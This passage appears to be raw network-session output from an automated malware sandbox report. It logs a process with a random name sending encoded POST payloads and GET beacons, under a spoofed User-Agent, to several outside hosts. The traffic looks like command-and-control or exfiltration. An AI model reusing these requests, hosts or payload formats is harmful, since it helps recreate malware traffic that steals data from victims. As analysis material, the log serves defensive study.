                                                                                                                                                                            Data Raw: 41 68 3d 39 4f 6c 52 6b 56 6a 41 64 65 6a 36 79 7a 54 58 69 4e 58 36 58 61 4a 4c 73 31 6e 39 47 47 59 46 34 34 79 50 62 67 65 35 6e 69 35 45 31 76 6f 4d 6c 77 54 50 70 68 4a 68 45 33 67 36 75 32 5a 36 39 36 67 6d 4a 6e 2f 4e 59 66 62 57 51 76 4d 75 39 4e 50 73 78 68 6a 6c 68 5a 2b 57 2b 4a 46 43 79 5a 6d 71 41 77 6b 39 4e 61 4b 41 50 4f 47 56 6e 70 41 52 48 6d 4e 4e 31 4a 6e 43 73 5a 4b 33 4d 63 5a 73 37 4f 30 39 61 49 76 58 2b 6e 79 79 78 52 63 30 4e 5a 7a 32 56 72 76 58 45 45 35 38 61 36 46 54 65 71 47 65 63 38 52 4f 44 4c 74 70 78 31 42 62 67 4a 6c 79 34 61 31 47 36 59 64 57 37 36 61 6b 6b 76 45 3d
                                                                                                                                                                            Data Ascii: Ah=9OlRkVjAdej6yzTXiNX6XaJLs1n9GGYF44yPbge5ni5E1voMlwTPphJhE3g6u2Z696gmJn/NYfbWQvMu9NPsxhjlhZ+W+JFCyZmqAwk9NaKAPOGVnpARHmNN1JnCsZK3McZs7O09aIvX+nyyxRc0NZz2VrvXEE58a6FTeqGec8RODLtpx1BbgJly4a1G6YdW76akkvE=
                                                                                                                                                                            Sep 27, 2024 17:30:46.411181927 CEST688INHTTP/1.1 404 Not Found
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:30:46 GMT
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6aXeM3MhiMSMnaUiXyy%2FWaGoGavnfbXxkPxmI9wQw7H3zgj9mXmFFwQVlcdcc%2B728iYBeObpIDAnQoB2wb6YqEK6odhz%2FM4Oxdc5%2FR6kXPC5Pyvw8Vmqmw9jpc2RoBB5lemxPg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                            CF-RAY: 8c9c896c7a1f4213-EWR
                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                            Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            10192.168.2.563703172.67.165.25805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:30:47.977514029 CEST861OUTPOST /f66t/ HTTP/1.1
                                                                                                                                                                            Host: www.b5x7vk.agency
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 223
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.b5x7vk.agency
                                                                                                                                                                            Referer: http://www.b5x7vk.agency/f66t/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Raw: 41 68 3d 39 4f 6c 52 6b 56 6a 41 64 65 6a 36 77 51 4c 58 75 50 2f 36 44 4b 4a 45 6a 56 6e 39 49 6d 59 4a 34 34 32 50 62 6b 47 70 6e 58 70 45 31 4f 59 4d 6d 30 48 50 75 68 4a 68 4d 58 67 37 67 57 5a 7a 39 36 73 55 4a 6a 2f 4e 59 62 4c 57 51 71 77 75 38 2b 33 7a 77 78 6a 6e 30 4a 2b 49 36 4a 46 43 79 5a 6d 71 41 77 42 6d 4e 62 69 41 50 2b 32 56 67 34 41 53 5a 32 4e 4d 32 4a 6e 43 6d 35 4b 7a 4d 63 5a 61 37 4f 45 48 61 4b 6e 58 2b 69 4f 79 78 44 34 7a 47 5a 7a 30 4c 62 76 43 58 55 38 59 63 4a 6f 53 45 4a 72 68 63 61 51 7a 43 39 41 44 72 58 4a 7a 7a 70 4a 4b 6f 4a 39 78 72 6f 38 2f 68 5a 4b 55 36 34 51 31 73 6c 44 69 45 70 33 52 77 69 76 72 43 48 67 36 62 73 79 39
                                                                                                                                                                            Data Ascii: Ah=9OlRkVjAdej6wQLXuP/6DKJEjVn9ImYJ442PbkGpnXpE1OYMm0HPuhJhMXg7gWZz96sUJj/NYbLWQqwu8+3zwxjn0J+I6JFCyZmqAwBmNbiAP+2Vg4ASZ2NM2JnCm5KzMcZa7OEHaKnX+iOyxD4zGZz0LbvCXU8YcJoSEJrhcaQzC9ADrXJzzpJKoJ9xro8/hZKU64Q1slDiEp3RwivrCHg6bsy9
                                                                                                                                                                            Sep 27, 2024 17:30:49.024214029 CEST684INHTTP/1.1 404 Not Found
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:30:48 GMT
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I6caT3V9PUjdDFr7KSnkRmMYcOmPRirgmFmZ7F5YR7XtMVz%2FdnZVdVzDY1KWArZkw4%2BAhZTOroSyr8AQVrC6QxM25lpRCBsxV1G5MHvGmlJ38dTxkmjl1P0npITEpWF9m2FLOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                            CF-RAY: 8c9c897c8905430d-EWR
                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                            Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            11192.168.2.563704172.67.165.25805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:30:50.525249958 CEST1878OUTPOST /f66t/ HTTP/1.1
                                                                                                                                                                            Host: www.b5x7vk.agency
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 1239
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.b5x7vk.agency
                                                                                                                                                                            Referer: http://www.b5x7vk.agency/f66t/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Raw: 41 68 3d 39 4f 6c 52 6b 56 6a 41 64 65 6a 36 77 51 4c 58 75 50 2f 36 44 4b 4a 45 6a 56 6e 39 49 6d 59 4a 34 34 32 50 62 6b 47 70 6e 55 4a 45 31 59 45 4d 6c 56 48 50 76 68 4a 68 54 6e 67 2b 67 57 59 6a 39 36 6b 51 4a 6a 7a 7a 59 5a 44 57 51 49 6f 75 31 76 33 7a 2b 42 6a 6e 32 4a 2b 56 2b 4a 46 58 79 64 4b 75 41 77 78 6d 4e 62 69 41 50 39 75 56 32 35 41 53 62 32 4e 4e 31 4a 6e 47 73 5a 4b 62 4d 63 51 76 37 50 78 6c 62 36 48 58 2b 47 53 79 7a 78 67 7a 46 35 7a 79 4b 62 75 48 58 56 41 48 63 4a 31 70 45 4a 76 62 63 64 63 7a 50 4c 56 55 36 54 46 2b 6e 71 78 75 6e 70 46 74 70 6f 77 5a 76 4a 65 30 6e 37 77 33 6e 47 7a 62 43 66 66 73 36 68 61 30 66 51 51 4b 55 72 50 4a 55 70 33 45 58 57 32 79 77 74 59 32 31 70 79 4e 76 4b 51 46 5a 74 4d 79 52 72 48 32 72 4e 6f 34 7a 4c 2f 65 30 7a 49 6e 7a 6c 45 5a 38 76 74 63 64 76 65 77 44 51 44 4e 58 61 69 45 51 58 77 49 71 66 67 4f 78 6d 45 4a 6c 4e 34 53 76 35 64 66 6a 39 42 6f 71 72 66 33 47 33 50 49 53 32 30 48 5a 41 6d 72 67 44 4e 2b 51 56 66 5a 30 63 7a 39 2f 49 74 [TRUNCATED]
                                                                                                                                                                            Data Ascii: Ah=9OlRkVjAdej6wQLXuP/6DKJEjVn9ImYJ442PbkGpnUJE1YEMlVHPvhJhTng+gWYj96kQJjzzYZDWQIou1v3z+Bjn2J+V+JFXydKuAwxmNbiAP9uV25ASb2NN1JnGsZKbMcQv7Pxlb6HX+GSyzxgzF5zyKbuHXVAHcJ1pEJvbcdczPLVU6TF+nqxunpFtpowZvJe0n7w3nGzbCffs6ha0fQQKUrPJUp3EXW2ywtY21pyNvKQFZtMyRrH2rNo4zL/e0zInzlEZ8vtcdvewDQDNXaiEQXwIqfgOxmEJlN4Sv5dfj9Boqrf3G3PIS20HZAmrgDN+QVfZ0cz9/It+bfCx8uR2q10CwbUp6XbX94Lty51dvx8AvozoF5YQorGb5jEvzDiqH3M9hy0Y9wi35n3WRqWo0BIRZgohvE+ihtI7oty8D9gfaZ5Qf0eYOsRIMee4wJU35pi7/IFoyteFAE70M31GIuj31n1CDzawu5o1v1dmsXp1tMri99NRKxiY0MX5oZCIN0BSqyBhDVYcueRxfIX0p61zpUTd1LOQo71gT2E1u4UQKa7q1dZFqWOOEPyzCq41CjO0qO/udvKnYkZf0CHHfUy6Sm9ByBC1L2uBZrv+aiN6S6P0KEOswqGPjdjlJV+s3/yS21CEPASYavYGVWpUJoGmpkON6om4umSJH+4HRpkw9p70OerT5GAqbiIjhbVrq4jjMaLtuXUX6dyQnJY2qN+A0HkKUggtki49kQMQrHJT/rY3EEXp61iqFlkGRNQcEPqIrfakSKQxgPBpBbE8gCpMk2Qq3wq+KjnFdwfJmoDhDUA8Ed8H73oN4BwBbn3gb/rm4q21T3yNyj40m7w/r/90qA9Z3+7OQijccFD8s+BHAepE1vyjl7XtwhOuS2cZkoDjkKUxEdl9ggI0DoGWW+29t+KKIVy/5zN2g0I7LMfIzBvi8CMRZ1XJLxZsZzBV6Pvgsd4jIUSG1fiperkPHaYVy0OGnCN0h/0UbTcWIiyza [TRUNCATED]
                                                                                                                                                                            Sep 27, 2024 17:30:51.501018047 CEST688INHTTP/1.1 404 Not Found
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:30:51 GMT
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dWHQVjxtLPBV%2BAEKFjoR8OkKv1BdvDYU6xxAY8%2BsMqMTf649w1yvfFdYe5SOsdmh1Ak19jJDL9RrPEzFsh4Df6%2FAWLA86jqJNoqSo61JkeNqy8KWuwb7M8hA%2BPBWGiMBrNvasg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                            CF-RAY: 8c9c898c2947c436-EWR
                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                            Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            12192.168.2.563705172.67.165.25805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:30:53.073514938 CEST585OUTGET /f66t/?Ah=wMNxngytVvT+xiDvhZKVBLBZglmuZQUCx/WcIyOXqUp4vIwezETUsTI6SXRinkgbo4oPfyScfq3TTLYR3fLN41mF5bem5ZFkurSKCCFsELulDfuy7v5fTUVM4J27kpDPZg==&6RGD=r8eHwnMpb2dxK HTTP/1.1
                                                                                                                                                                            Host: www.b5x7vk.agency
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Sep 27, 2024 17:30:54.069080114 CEST742INHTTP/1.1 404 Not Found
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:30:54 GMT
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fGHQt%2Fn4mIQJsdIoR5kriFbshWEY0VR0Qg7LGnSkF0v4q2o0Kd7va7Ne6pdqHRvUYuc9x1Yu2jn2QMnI3I6pVl1XazmJ1Vw8zjCE%2BR5zqfSlSdzlnnm9W7q0YF9rCaq%2FEMt30g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                            Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                            CF-RAY: 8c9c899c294942ea-EWR
                                                                                                                                                                            Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            13192.168.2.563706208.91.197.27805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:30:59.404990911 CEST856OUTPOST /7kkb/ HTTP/1.1
                                                                                                                                                                            Host: www.martaschrimpf.info
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 203
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.martaschrimpf.info
                                                                                                                                                                            Referer: http://www.martaschrimpf.info/7kkb/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Raw: 41 68 3d 59 73 33 62 49 43 2b 43 63 65 68 6c 72 48 67 75 53 48 6c 65 4b 52 54 66 53 39 4e 43 70 56 57 70 5a 33 2b 2b 4c 4f 31 69 62 36 4f 7a 56 39 4e 79 32 77 65 39 56 37 54 50 66 38 5a 32 7a 63 44 34 49 57 30 4a 32 4a 7a 58 54 43 42 44 53 36 44 74 51 68 44 50 63 73 36 79 4d 67 64 38 73 38 37 52 71 4e 75 39 79 5a 5a 50 2f 70 32 42 6e 50 78 61 37 59 63 61 68 50 75 44 74 37 49 57 5a 51 31 78 2b 42 65 77 53 41 61 67 53 66 4f 6b 7a 6d 2f 30 77 78 43 57 57 54 62 75 67 72 76 66 4f 37 61 54 6b 59 56 42 74 55 59 49 66 53 6c 59 61 54 6d 53 55 61 79 6e 73 4d 4b 4d 76 38 2f 49 6b 56 55 52 5a 2b 64 6f 74 69 49 3d
                                                                                                                                                                            Data Ascii: Ah=Ys3bIC+CcehlrHguSHleKRTfS9NCpVWpZ3++LO1ib6OzV9Ny2we9V7TPf8Z2zcD4IW0J2JzXTCBDS6DtQhDPcs6yMgd8s87RqNu9yZZP/p2BnPxa7YcahPuDt7IWZQ1x+BewSAagSfOkzm/0wxCWWTbugrvfO7aTkYVBtUYIfSlYaTmSUaynsMKMv8/IkVURZ+dotiI=


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            14192.168.2.563707208.91.197.27805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:31:01.967781067 CEST876OUTPOST /7kkb/ HTTP/1.1
                                                                                                                                                                            Host: www.martaschrimpf.info
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 223
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.martaschrimpf.info
                                                                                                                                                                            Referer: http://www.martaschrimpf.info/7kkb/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Raw: 41 68 3d 59 73 33 62 49 43 2b 43 63 65 68 6c 71 6e 38 75 51 67 52 65 43 52 54 65 63 64 4e 43 69 31 57 74 5a 33 36 2b 4c 50 68 4d 62 49 71 7a 56 63 64 79 33 31 79 39 63 72 54 50 48 73 5a 2f 72 38 44 6a 49 57 34 42 32 4d 4c 58 54 43 56 44 53 2f 76 74 52 57 33 49 64 38 36 30 41 41 64 2b 69 63 37 52 71 4e 75 39 79 5a 4d 71 2f 70 65 42 6e 2b 42 61 30 5a 63 64 76 76 75 41 75 37 49 57 64 51 31 4c 2b 42 65 53 53 45 61 61 53 63 32 6b 7a 6e 50 30 78 6a 6d 52 63 54 62 6f 39 37 76 4b 50 59 6e 43 75 62 52 68 77 32 68 6f 4f 43 64 64 53 46 4c 34 4f 34 36 50 2f 73 6d 30 2f 76 33 2f 31 6c 31 34 44 64 4e 59 7a 31 65 74 75 74 4c 39 74 37 4d 30 5a 6d 38 74 56 4c 54 6d 79 73 2b 2f
                                                                                                                                                                            Data Ascii: Ah=Ys3bIC+Ccehlqn8uQgReCRTecdNCi1WtZ36+LPhMbIqzVcdy31y9crTPHsZ/r8DjIW4B2MLXTCVDS/vtRW3Id860AAd+ic7RqNu9yZMq/peBn+Ba0ZcdvvuAu7IWdQ1L+BeSSEaaSc2kznP0xjmRcTbo97vKPYnCubRhw2hoOCddSFL4O46P/sm0/v3/1l14DdNYz1etutL9t7M0Zm8tVLTmys+/


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            15192.168.2.563708208.91.197.27805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:31:04.512590885 CEST1893OUTPOST /7kkb/ HTTP/1.1
                                                                                                                                                                            Host: www.martaschrimpf.info
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 1239
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.martaschrimpf.info
                                                                                                                                                                            Referer: http://www.martaschrimpf.info/7kkb/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Raw: 41 68 3d 59 73 33 62 49 43 2b 43 63 65 68 6c 71 6e 38 75 51 67 52 65 43 52 54 65 63 64 4e 43 69 31 57 74 5a 33 36 2b 4c 50 68 4d 62 49 69 7a 57 75 46 79 31 53 6d 39 47 72 54 50 5a 38 5a 79 72 38 43 68 49 58 51 37 32 4d 32 69 54 42 74 44 64 35 37 74 57 6e 33 49 54 38 36 30 49 67 64 37 73 38 37 49 71 4e 2b 35 79 5a 63 71 2f 70 65 42 6e 39 5a 61 39 6f 63 64 2f 66 75 44 74 37 49 61 5a 51 30 6b 2b 42 47 6f 53 45 4f 77 53 73 57 6b 79 48 66 30 32 51 43 52 51 54 62 71 2b 37 75 50 50 59 71 61 75 59 6c 4c 77 79 70 4f 4f 42 4e 64 44 52 79 46 4a 4c 4f 78 67 4e 75 77 79 73 76 6a 72 7a 67 59 4a 75 31 4f 78 58 79 58 6e 73 72 67 6e 73 30 6b 62 31 56 36 4f 63 62 78 7a 59 66 2f 2b 36 69 4c 77 73 72 41 50 4a 30 4b 58 78 30 33 42 70 46 44 4d 73 32 74 33 7a 76 6d 31 6a 4b 39 4c 58 71 6e 43 37 50 78 64 68 6d 52 53 79 66 30 4b 6a 33 51 69 37 4c 37 54 63 31 39 48 30 57 58 43 50 37 53 4b 47 35 32 61 78 41 45 33 68 57 43 47 42 36 6e 61 41 49 37 6e 4b 45 6c 32 55 48 44 64 72 67 6b 69 61 72 2f 50 58 65 65 59 5a 30 77 38 75 43 [TRUNCATED]
                                                                                                                                                                            Data Ascii: Ah=Ys3bIC+Ccehlqn8uQgReCRTecdNCi1WtZ36+LPhMbIizWuFy1Sm9GrTPZ8Zyr8ChIXQ72M2iTBtDd57tWn3IT860Igd7s87IqN+5yZcq/peBn9Za9ocd/fuDt7IaZQ0k+BGoSEOwSsWkyHf02QCRQTbq+7uPPYqauYlLwypOOBNdDRyFJLOxgNuwysvjrzgYJu1OxXyXnsrgns0kb1V6OcbxzYf/+6iLwsrAPJ0KXx03BpFDMs2t3zvm1jK9LXqnC7PxdhmRSyf0Kj3Qi7L7Tc19H0WXCP7SKG52axAE3hWCGB6naAI7nKEl2UHDdrgkiar/PXeeYZ0w8uCJHOGbpI5gvoYVKItpSrr3X9bDmAM+Juk2u4M8tPHXbtbRSEyJWKFS4nIftizMT65vWgy2MNiObopWbY7+7u3FppQmQoOL51QNBIuHEjSp0XnyonGoUI69BgvfGm83At12/IdqgNFmwAtNjW0sGm72jCKMwREBVkQ14kUP7Ga3XStzDXfcxHNJlU01sJHO+b76Zw8tD2iWXCcOS56MObjP759gtZLvJsl+D07sLxN2re1zM8AUbHTCZZ3RE0NvtFyJhJVjqFd/N5FGNClv2Man60qPjOsbAN4eGAqiybqlYQpAFsKMYRyJJBewKWIIMmL2wnPk78Yx2u++MSQski6oxUEXW3k2pYL8PKahkMZemxldnqz9V79X+uVpvFtVKorNXCO8IASp0gTA9jsykFaTVqk+qmuGqcNqZ3j99LNDFABWkaFrC+/mFqwtMA0rLz6Ak9eId+1BFbYYxK9VCdQBXIbF+4uSEIFJeBQyL6GTbkL170XfYhu9hJJK35W9uw7j7dgWOVA8tcMtYYHNAbylPncHdd4F5WrYrwGyfPl471f+kgUdzdnTt67XvSlTNofh0OxY1hxpaS8hz9FXnw7c5akrpbg4p2u4RbF/bCpPLpz5k7vXw2ufusPhkvkwFzDsEs4febebN+454XwyhA+PvNj+56i7SZPzH [TRUNCATED]


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            16192.168.2.563709208.91.197.27805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:31:07.046612024 CEST590OUTGET /7kkb/?6RGD=r8eHwnMpb2dxK&Ah=Vuf7L1aATO5bukV8eQdUIEmIaPgQ1yOpdgGCLe1WZLTuWrNT4xutTpWyFskV9eTAAXQRhMy7Zgc6S7zaREH9Qt7yJDZ+mejpqMKnoLgUtbmjvcVg7/Biou/HjIkaZAov/Q== HTTP/1.1
                                                                                                                                                                            Host: www.martaschrimpf.info
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Sep 27, 2024 17:31:09.486481905 CEST1236INHTTP/1.1 200 OK
